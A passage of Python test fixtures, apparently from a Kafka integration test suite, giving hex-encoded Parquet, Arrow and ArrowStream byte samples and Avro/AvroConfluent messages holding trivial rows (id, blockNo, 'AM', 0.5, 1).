\x08\x01\x02\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x02\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x02\x19\x1c\x19\x5c\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\
x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\x98\x05\x16\x02\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc4\x01\x00\x00\x50\x41\x52\x31',
],
},
'AvroConfluent': {
'data_sample': [
avro_confluent_message(schema_registry_client,
{'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
b''.join([avro_confluent_message(schema_registry_client,
{'id': id, 'blockNo': 0, 'val1': str('AM'),
'val2': 0.5, "val3": 1}) for id in range(1, 16)]),
avro_confluent_message(schema_registry_client,
{'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
],
'extra_settings': ", format_avro_schema_registry_url='http://{}:{}'".format(
kafka_cluster.schema_registry_host,
8081
),
'supports_empty_value': True,
},
'Avro': {
# It seems impossible to send more than one Avro file per message
# because of the nature of Avro: blocks go one after another.
'data_sample': [
avro_message({'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
avro_message([{'id': id, 'blockNo': 0, 'val1': str('AM'),
'val2': 0.5, "val3": 1} for id in range(1, 16)]),
avro_message({'id': 0, 'blockNo': 0, 'val1': str('AM'), 'val2': 0.5, "val3": 1}),
],
'supports_empty_value': False,
},
'Arrow' : {
'data_sample' : [
b'\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\
x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
b'\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x08\x00\x00\x00\x0a\x00\x00\x00\x0c\x00\x00\x00\x0e\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00\
x14\x00\x00\x00\x16\x00\x00\x00\x18\x00\x00\x00\x1a\x00\x00\x00\x1c\x00\x00\x00\x1e\x00\x00\x00\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
b'\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\
x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
],
},
'ArrowStream' : {
'data_sample' : [
b'\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\